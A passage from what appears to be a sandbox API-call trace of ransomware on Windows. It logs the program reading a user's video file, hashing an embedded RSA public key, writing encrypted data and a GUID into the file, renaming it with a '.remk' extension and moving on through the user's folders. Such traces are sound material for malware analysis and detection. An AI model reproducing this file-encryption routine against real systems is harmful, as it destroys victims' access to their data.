halpmcxz\\videos\\pcpks0u\\csfg h-wcbkcac\\zcc-nq6c5y\\cd1puedabr.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0236.933] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=38467) returned 1 [0236.933] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0236.936] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x961d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0236.936] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0236.938] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0236.938] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0236.938] SetFilePointer (in: hFile=0x640, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0236.938] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0x9643, lpOverlapped=0x0) returned 1 [0236.939] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0236.939] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f6) returned 0x31c0d08 [0236.939] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0236.939] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0236.939] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x694f48) returned 1 [0236.940] CryptCreateHash (in: hProv=0x694f48, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0236.940] CryptHashData (hHash=0x31de170, pbData=0x31c0d08, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0236.940] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0236.940] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x31a0f08 [0236.940] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0236.940] GetLastError () returned 0x0 [0236.940] CryptDestroyHash (hHash=0x31de170) returned 1 [0236.940] CryptReleaseContext (hProv=0x694f48, dwFlags=0x0) returned 1 [0236.940] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0d08 | out: hHeap=0x630000) returned 1 [0236.940] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0236.940] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0236.941] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0236.941] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0236.941] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0236.941] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0236.941] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9640) returned 0x37cf820 [0236.941] SetFilePointer (in: hFile=0x640, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0236.941] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a90 | out: hHeap=0x630000) returned 1 [0236.941] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x31c0d08 [0236.941] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0236.941] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x325fb40 [0236.941] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d6990 [0236.941] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x37cf0a8 [0236.941] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc8e8 [0236.941] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x37cf0f0 [0236.941] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc900 [0236.941] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc930 [0236.941] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc990 [0236.941] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc948 [0236.941] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x31ec670 [0236.941] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x31f7b30 [0236.941] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x31f7b30, Size=0x218) returned 0x37b1db0 [0236.942] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x37b5b70 [0236.942] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc930 | out: hHeap=0x630000) returned 1 [0236.942] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc948 | out: hHeap=0x630000) returned 1 [0236.942] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc990 | out: hHeap=0x630000) returned 1 [0236.942] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ec670 | out: hHeap=0x630000) returned 1 [0236.942] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0236.942] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc990 [0236.942] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fee0 [0236.942] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x37bc948 [0236.942] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0f28 [0236.942] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x37bc930 [0236.942] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fea0 [0236.942] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x31c0f10 [0236.942] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0236.942] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d6930 [0236.942] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f08 [0236.942] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x31f6b30 [0236.942] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0ee8 [0236.942] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72feb0 [0236.942] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0f10 | out: hHeap=0x630000) returned 1 [0236.942] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc948 | out: hHeap=0x630000) returned 1 [0236.942] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fea0 | out: hHeap=0x630000) returned 1 [0236.942] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc930 | out: hHeap=0x630000) returned 1 [0236.942] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0f28 | out: hHeap=0x630000) returned 1 [0236.942] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0236.942] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc990 | out: hHeap=0x630000) returned 1 [0236.943] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0236.943] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31d6990 | out: hHeap=0x630000) returned 1 [0236.943] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b1db0 | out: hHeap=0x630000) returned 1 [0236.943] GetCurrentThreadId () returned 0x314 [0236.943] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x31c0f10 [0236.943] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x37c65f0 [0236.943] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x31a8ac8 [0236.943] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x694f48 [0236.943] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x37bddc8 [0236.943] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fee0 [0236.943] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fea0 [0236.943] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x31a4298 [0236.943] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0236.943] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0236.943] GetCurrentThreadId () returned 0x314 [0236.943] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0236.943] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0236.943] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x3192918 [0236.943] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0236.943] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0236.943] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0236.943] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0236.943] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3192918 | out: hHeap=0x630000) returned 1 [0236.943] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x3192918 [0236.943] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0236.943] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x31b5808 [0236.943] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fee0 [0236.944] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x65dd10 [0236.944] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72ff00 [0236.944] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc990 [0236.944] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0236.944] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72ff00 [0236.944] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fec0 [0236.944] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x68ed28 [0236.944] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x68ed18 [0236.944] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f758 [0236.944] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f768 [0236.944] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f778 [0236.944] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc930 [0236.944] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0236.944] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fec0 [0236.944] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0236.944] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72ff00 [0236.944] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f788 [0236.944] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f798 [0236.944] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f7a8 [0236.944] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc948 [0236.944] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f798 | out: hHeap=0x630000) returned 1 [0236.944] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f28 [0236.944] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f788 | out: hHeap=0x630000) returned 1 [0236.944] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc918 [0236.944] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f7a8 | out: hHeap=0x630000) returned 1 [0236.944] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc9a8 [0236.945] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0236.945] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72ff00 [0236.945] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f768 | out: hHeap=0x630000) returned 1 [0236.945] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc978 [0236.945] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0236.945] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc960 [0236.945] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed28 | out: hHeap=0x630000) returned 1 [0236.945] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x37bc9c0 [0236.945] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc960 | out: hHeap=0x630000) returned 1 [0236.945] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x37bc960 [0236.945] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc978 | out: hHeap=0x630000) returned 1 [0236.945] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x68ed28 [0236.945] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0236.945] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0ea8 [0236.945] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed28 | out: hHeap=0x630000) returned 1 [0236.945] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0ec8 [0236.945] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc930 | out: hHeap=0x630000) returned 1 [0236.945] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc930 [0236.945] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0236.945] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x204) returned 0x325fd48 [0236.945] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc990 | out: hHeap=0x630000) returned 1 [0236.945] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x31f6e78 [0236.945] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc9c0 | out: hHeap=0x630000) returned 1 [0236.945] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x210) returned 0x37b5b70 [0236.945] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ec8 | out: hHeap=0x630000) returned 1 [0236.946] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10c) returned 0x3195950 [0236.946] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed18 | out: hHeap=0x630000) returned 1 [0236.946] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x31f6c48 [0236.946] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc930 | out: hHeap=0x630000) returned 1 [0236.946] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x37b5d88 [0236.946] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6e78 | out: hHeap=0x630000) returned 1 [0236.946] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x72aea0 [0236.946] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fea0 | out: hHeap=0x630000) returned 1 [0236.946] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x694f48 | out: hHeap=0x630000) returned 1 [0236.946] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x9643, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0236.946] WriteFile (in: hFile=0x640, lpBuffer=0x31c0f10*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x31c0f10*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0236.947] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0236.947] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0236.947] CloseHandle (hObject=0x640) returned 1 [0236.954] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xb0) returned 0x3186340 [0236.954] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8c0) returned 0x37bd408 [0236.955] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\PCPKs0u\\CSFg h-wcbKcac\\ZCC-nq6c5y\\cd1puEdABr.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\pcpks0u\\csfg h-wcbkcac\\zcc-nq6c5y\\cd1puedabr.mp4"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\PCPKs0u\\CSFg h-wcbKcac\\ZCC-nq6c5y\\cd1puEdABr.mp4.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\pcpks0u\\csfg h-wcbkcac\\zcc-nq6c5y\\cd1puedabr.mp4.remk")) returned 1 [0236.958] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x98cf75b0, ftCreationTime.dwHighDateTime=0x1d5dd76, ftLastAccessTime.dwLowDateTime=0x8913cb00, ftLastAccessTime.dwHighDateTime=0x1d5deaa, ftLastWriteTime.dwLowDateTime=0x8913cb00, ftLastWriteTime.dwHighDateTime=0x1d5deaa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="S Vy53", cAlternateFileName="SVY53~1")) returned 1 [0236.958] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b6420 [0236.958] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b6768 [0236.958] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b6960 [0236.958] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x98cf75b0, ftCreationTime.dwHighDateTime=0x1d5dd76, ftLastAccessTime.dwLowDateTime=0x8913cb00, ftLastAccessTime.dwHighDateTime=0x1d5deaa, ftLastWriteTime.dwLowDateTime=0x8913cb00, ftLastWriteTime.dwHighDateTime=0x1d5deaa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="S Vy53", cAlternateFileName="SVY53~1")) returned 0 [0236.958] FindClose (in: hFindFile=0x31de130 | out: hFindFile=0x31de130) returned 1 [0236.958] PeekMessageW (in: lpMsg=0x3adff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adff08) returned 0 [0236.958] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b6420 [0236.958] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0236.958] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b6768 [0236.958] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0236.958] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\PCPKs0u\\CSFg h-wcbKcac\\_2KhhEZ4Uf5pHRY\\") returned="_2KhhEZ4Uf5pHRY\\" [0236.958] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a20 [0236.959] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x694f48 [0236.959] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\PCPKs0u\\CSFg h-wcbKcac\\") returned="CSFg h-wcbKcac\\" [0236.959] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711a38 [0236.959] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\PCPKs0u\\") returned="PCPKs0u\\" [0236.959] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x31b5808 [0236.959] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned="Videos\\" [0236.959] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x37cf0f0 [0236.959] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0236.959] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0236.959] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0236.959] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0236.959] PathFindFileNameW (pszPath="") returned="" [0236.959] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b6768 [0236.959] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\PCPKs0u\\CSFg h-wcbKcac\\_2KhhEZ4Uf5pHRY\\*", lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x60f04910, ftCreationTime.dwHighDateTime=0x1d5e124, ftLastAccessTime.dwLowDateTime=0x58b54ab0, ftLastAccessTime.dwHighDateTime=0x1d5dc9d, ftLastWriteTime.dwLowDateTime=0x58b54ab0, ftLastWriteTime.dwHighDateTime=0x1d5dc9d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x31de130 [0236.962] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x60f04910, ftCreationTime.dwHighDateTime=0x1d5e124, ftLastAccessTime.dwLowDateTime=0x58b54ab0, ftLastAccessTime.dwHighDateTime=0x1d5dc9d, ftLastWriteTime.dwLowDateTime=0x58b54ab0, ftLastWriteTime.dwHighDateTime=0x1d5dc9d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0236.962] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9af1a930, ftCreationTime.dwHighDateTime=0x1d5d9e3, ftLastAccessTime.dwLowDateTime=0x37bb49e0, ftLastAccessTime.dwHighDateTime=0x1d5d897, ftLastWriteTime.dwLowDateTime=0x37bb49e0, ftLastWriteTime.dwHighDateTime=0x1d5d897, nFileSizeHigh=0x0, 